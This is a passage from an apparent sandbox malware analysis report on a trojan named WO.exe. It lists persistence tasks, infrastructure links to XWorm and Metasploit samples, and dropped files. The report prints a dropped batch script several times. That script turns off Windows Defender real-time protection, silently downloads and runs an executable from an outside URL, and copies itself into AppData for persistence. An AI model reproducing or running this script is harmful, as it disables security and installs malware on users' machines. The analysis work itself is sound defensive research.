                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:WO.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@102/44@1/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 110
                                        • Number of non-executed functions: 126
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: WO.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        13:53:56API Interceptor112x Sleep call for process: powershell.exe modified
                                        18:54:05Task SchedulerRun new task: RunRedditLogon path: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                        18:54:05Task SchedulerRun new task: RunRedditMinute path: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        147.185.221.23reddit.exeGet hashmaliciousMetasploitBrowse
                                          dr2YKJiGH9.exeGet hashmaliciousXWormBrowse
                                            jSm8N1jXbk.exeGet hashmaliciousS400 RATBrowse
                                              enigma_loader.exeGet hashmaliciousXWormBrowse
                                                exe006.exeGet hashmaliciousSheetRatBrowse
                                                  yF21ypxRB7.exeGet hashmaliciousXWormBrowse
                                                    9GlCWW6bXc.exeGet hashmaliciousXWormBrowse
                                                      fiPZoO6xvJ.exeGet hashmaliciousXWormBrowse
                                                        EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                          eternal.exeGet hashmaliciousXWormBrowse

                                                            Domains

                                                            No context

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            A2HOSTINGUSv4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                            • 209.124.66.28
                                                            t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                            • 209.124.66.28
                                                            Memo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                                            • 66.198.240.43
                                                            236236236.elfGet hashmaliciousUnknownBrowse
                                                            • 68.66.200.215
                                                            sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 68.66.210.5
                                                            rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 185.148.129.20
                                                            https://sunnycloudtechnologies.com/suncn/msd.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 68.66.226.73
                                                            rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 185.149.112.83
                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                            • 209.124.66.28
                                                            List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                            • 209.124.66.28
                                                            SALSGIVERUSreddit.exeGet hashmaliciousMetasploitBrowse
                                                            • 147.185.221.23
                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 147.176.119.110
                                                            horrify's Modx Menu v1.exeGet hashmaliciousXWormBrowse
                                                            • 147.185.221.24
                                                            fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                            • 147.185.221.24
                                                            8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                            • 147.185.221.24
                                                            twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                            • 147.185.221.18
                                                            YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 147.185.221.18
                                                            dr2YKJiGH9.exeGet hashmaliciousXWormBrowse
                                                            • 147.185.221.23
                                                            KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                            • 147.185.221.24
                                                            PjGz899RZV.exeGet hashmaliciousXWormBrowse
                                                            • 147.185.221.24

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eChoForgot.exeGet hashmaliciousVidarBrowse
                                                            • 185.151.51.214
                                                            payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                            • 185.151.51.214
                                                            1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 185.151.51.214
                                                            Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                            • 185.151.51.214
                                                            acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                            • 185.151.51.214
                                                            Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                            • 185.151.51.214
                                                            Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 185.151.51.214
                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                            • 185.151.51.214
                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                            • 185.151.51.214
                                                            nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                            • 185.151.51.214

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................

                                                            C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\WO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2513
                                                            Entropy (8bit):4.996405902922014
                                                            Encrypted:false
                                                            SSDEEP:48:RzZ+iRM0nUOpqeld8wXm/Nld5cn/W5ktwKOvV4vGSkt0:COUiZDVm/NDyHwK+n0
                                                            MD5:C0E9BC2DFFF6E08DF8196809B9BBF253
                                                            SHA1:006E88EA359145C40A6BBCA55E6F21B387999255
                                                            SHA-256:43C1DFAFAC6C340F420057606F317C2D0D3182C04F1A9C76B782F818C85F4F11
                                                            SHA-512:5B0C012ACA5479BF3B8852E1504465CCB2AD6CE4134EE8D2AD57C898FD91AC19F96A669EBC3A9201E65099ED1723F4515B48CA25EA21681AD45377CE3D9CA60C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat, Author: Joe Security
                                                            Preview:@shift /0..@echo off....:: Disable Windows Defender Real-Time Protection immediately..powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"..echo Real-Time Protection disabled immediately.....:: Check and delete existing reddit.exe in %temp%..if exist "%temp%\reddit.exe" (.. del /f /q "%temp%\reddit.exe".. echo Previous reddit.exe deleted...)....:: Download reddit.exe..powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', '%temp%\reddit.exe')"..echo reddit.exe downloaded.....:: Run reddit.exe minimized..start "" /min "%temp%\reddit.exe"..echo reddit.exe is now running.....:: Create the HiddenScripts folder (not hidden but still in AppData)..set "hiddenDir=%appdata%\HiddenScripts"..mkdir "%hiddenDir%" >nul 2>&1....:: Copy this script to HiddenScripts and make it accessible..set "originalScript=%~nx0"..copy "%~f0" "%hiddenDir%\%originalScript%" /Y >nul..attrib -h "%hiddenDir%\%ori

                                                            C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2513
                                                            Entropy (8bit):4.996405902922014
                                                            Encrypted:false
                                                            SSDEEP:48:RzZ+iRM0nUOpqeld8wXm/Nld5cn/W5ktwKOvV4vGSkt0:COUiZDVm/NDyHwK+n0
                                                            MD5:C0E9BC2DFFF6E08DF8196809B9BBF253
                                                            SHA1:006E88EA359145C40A6BBCA55E6F21B387999255
                                                            SHA-256:43C1DFAFAC6C340F420057606F317C2D0D3182C04F1A9C76B782F818C85F4F11
                                                            SHA-512:5B0C012ACA5479BF3B8852E1504465CCB2AD6CE4134EE8D2AD57C898FD91AC19F96A669EBC3A9201E65099ED1723F4515B48CA25EA21681AD45377CE3D9CA60C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat, Author: Joe Security
                                                            Preview:@shift /0..@echo off....:: Disable Windows Defender Real-Time Protection immediately..powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"..echo Real-Time Protection disabled immediately.....:: Check and delete existing reddit.exe in %temp%..if exist "%temp%\reddit.exe" (.. del /f /q "%temp%\reddit.exe".. echo Previous reddit.exe deleted...)....:: Download reddit.exe..powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', '%temp%\reddit.exe')"..echo reddit.exe downloaded.....:: Run reddit.exe minimized..start "" /min "%temp%\reddit.exe"..echo reddit.exe is now running.....:: Create the HiddenScripts folder (not hidden but still in AppData)..set "hiddenDir=%appdata%\HiddenScripts"..mkdir "%hiddenDir%" >nul 2>&1....:: Copy this script to HiddenScripts and make it accessible..set "originalScript=%~nx0"..copy "%~f0" "%hiddenDir%\%originalScript%" /Y >nul..attrib -h "%hiddenDir%\%ori

                                                            C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2513
                                                            Entropy (8bit):4.996405902922014
                                                            Encrypted:false
                                                            SSDEEP:48:RzZ+iRM0nUOpqeld8wXm/Nld5cn/W5ktwKOvV4vGSkt0:COUiZDVm/NDyHwK+n0
                                                            MD5:C0E9BC2DFFF6E08DF8196809B9BBF253
                                                            SHA1:006E88EA359145C40A6BBCA55E6F21B387999255
                                                            SHA-256:43C1DFAFAC6C340F420057606F317C2D0D3182C04F1A9C76B782F818C85F4F11
                                                            SHA-512:5B0C012ACA5479BF3B8852E1504465CCB2AD6CE4134EE8D2AD57C898FD91AC19F96A669EBC3A9201E65099ED1723F4515B48CA25EA21681AD45377CE3D9CA60C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat, Author: Joe Security
                                                            Preview:@shift /0..@echo off....:: Disable Windows Defender Real-Time Protection immediately..powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"..echo Real-Time Protection disabled immediately.....:: Check and delete existing reddit.exe in %temp%..if exist "%temp%\reddit.exe" (.. del /f /q "%temp%\reddit.exe".. echo Previous reddit.exe deleted...)....:: Download reddit.exe..powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', '%temp%\reddit.exe')"..echo reddit.exe downloaded.....:: Run reddit.exe minimized..start "" /min "%temp%\reddit.exe"..echo reddit.exe is now running.....:: Create the HiddenScripts folder (not hidden but still in AppData)..set "hiddenDir=%appdata%\HiddenScripts"..mkdir "%hiddenDir%" >nul 2>&1....:: Copy this script to HiddenScripts and make it accessible..set "originalScript=%~nx0"..copy "%~f0" "%hiddenDir%\%originalScript%" /Y >nul..attrib -h "%hiddenDir%\%ori

                                                            C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2513
                                                            Entropy (8bit):4.996405902922014
                                                            Encrypted:false
                                                            SSDEEP:48:RzZ+iRM0nUOpqeld8wXm/Nld5cn/W5ktwKOvV4vGSkt0:COUiZDVm/NDyHwK+n0
                                                            MD5:C0E9BC2DFFF6E08DF8196809B9BBF253
                                                            SHA1:006E88EA359145C40A6BBCA55E6F21B387999255
                                                            SHA-256:43C1DFAFAC6C340F420057606F317C2D0D3182C04F1A9C76B782F818C85F4F11
                                                            SHA-512:5B0C012ACA5479BF3B8852E1504465CCB2AD6CE4134EE8D2AD57C898FD91AC19F96A669EBC3A9201E65099ED1723F4515B48CA25EA21681AD45377CE3D9CA60C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat, Author: Joe Security
                                                            Preview:@shift /0..@echo off....:: Disable Windows Defender Real-Time Protection immediately..powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"..echo Real-Time Protection disabled immediately.....:: Check and delete existing reddit.exe in %temp%..if exist "%temp%\reddit.exe" (.. del /f /q "%temp%\reddit.exe".. echo Previous reddit.exe deleted...)....:: Download reddit.exe..powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', '%temp%\reddit.exe')"..echo reddit.exe downloaded.....:: Run reddit.exe minimized..start "" /min "%temp%\reddit.exe"..echo reddit.exe is now running.....:: Create the HiddenScripts folder (not hidden but still in AppData)..set "hiddenDir=%appdata%\HiddenScripts"..mkdir "%hiddenDir%" >nul 2>&1....:: Copy this script to HiddenScripts and make it accessible..set "originalScript=%~nx0"..copy "%~f0" "%hiddenDir%\%originalScript%" /Y >nul..attrib -h "%hiddenDir%\%ori

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k3twh3c.fd1.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10cpq2nh.nne.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1polcjk3.gxm.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40s0jnae.fy1.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54ybvrq0.kje.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5i5sg14g.hyw.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amyahbs4.chd.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqzg3yaq.pyo.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cj2b3qia.pwx.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxxzjzf4.5ut.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gw05wxyu.idw.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvcw04ar.dvp.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4e5dj1m.ngi.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kblrfivv.nq4.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lepjhn4s.xsy.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfhd4ars.smv.psm1

                                                            Download File
